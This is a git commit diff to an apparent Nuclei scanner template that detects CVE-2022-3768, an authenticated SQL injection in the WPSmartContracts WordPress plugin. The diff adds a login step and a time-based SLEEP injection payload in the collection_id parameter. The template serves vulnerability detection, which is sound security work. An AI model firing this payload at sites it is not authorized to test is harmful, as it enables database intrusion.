added-login-request and matcher update

2026-01-31 15:53:33 +08:00 · 2022-12-27 21:40:38 +05:30
parent 0f7d6b9c96
commit bd2faf2369
1 changed files with 20 additions and 23 deletions
--- a/cves/2022/CVE-2022-3768.yaml
+++ b/cves/2022/CVE-2022-3768.yaml
@@ -1,11 +1,12 @@
 id: CVE-2022-3768

 info:
-  name: WPSmartContracts < 1.3.12 - Author+ SQLi
+  name: WPSmartContracts < 1.3.12 - Author SQLi
  author: Hardik-Solanki
  severity: high
  description: |
    The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
+  remediation: Fixed in version 1.3.12
  reference:
    - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
@@ -18,33 +19,29 @@ info:
    cwe-id: CWE-89
  metadata:
    verified: "true"
-  tags: cve,cve2022,wordpress,wp-plugin,wp,sql,WPSmartContracts
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated

 requests:
  - raw:
      - |
-        GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(45)))hlAf)&uid=1 HTTP/1.1
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
        Host: {{Hostname}}

-    unsafe: true
-    matchers-condition: and
+    cookie-reuse: true
    matchers:
-      - type: word
-        part: body
-        words:
-          - NFTs
-
-      - type: word
-        part: body
-        words:
-          - Batch Mint NFTs
-
-      - type: word
-        part: body
-        words:
-          - nft_page_nft-batch-mint
+      - type: dsl
+        dsl:
+          - 'duration_2>=5'
+          - 'status_code_2 == 200'
+          - 'contains(content_type_2, "text/html")'
+          - 'contains(body_2, "Batch Mint NFTs")'
        condition: and
-
-      - type: status
-        status:
-          - 200